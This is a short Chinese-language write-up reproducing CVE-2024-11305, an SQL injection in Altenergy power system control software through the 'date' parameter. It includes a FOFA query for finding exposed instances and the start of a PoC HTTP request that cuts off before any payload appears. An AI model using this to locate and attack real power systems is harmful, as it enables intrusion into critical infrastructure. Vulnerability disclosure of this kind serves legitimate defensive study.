Altenergy电力系统控制软件 status_zigbee SQL注入漏洞复现(CVE-2024-11305)
0x01 产品简介
Altenergy电力系统控制软件是Altenergy Power System推出的一款专业软件。旨在为用户提供全面、高效、安全的电力系统控制解决方案。广泛应用于各类电力系统领域,如电力调度中心、发电厂、变电站、工业园区等。通过该软件的应用,用户可以实现对电力系统的全面监控和管理,提高电力系统的稳定性和安全性,降低运维成本。
0x02 漏洞概述
Altenergy 电力系统控制软件中发现了一个被归类为严重漏洞。此漏洞影响文件 /index.php/display/status_zigbee 的 get_status_zigbee 函数。使用未知输入操纵参数 date 会导致 sql 注入漏洞。
0x03 影响范围
Power Control Software 20241108
0x04 复现环境
FOFA:title="Altenergy Power Control Software"
0x05 漏洞复现
PoC
POST /index.php/display/status_zigbee HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS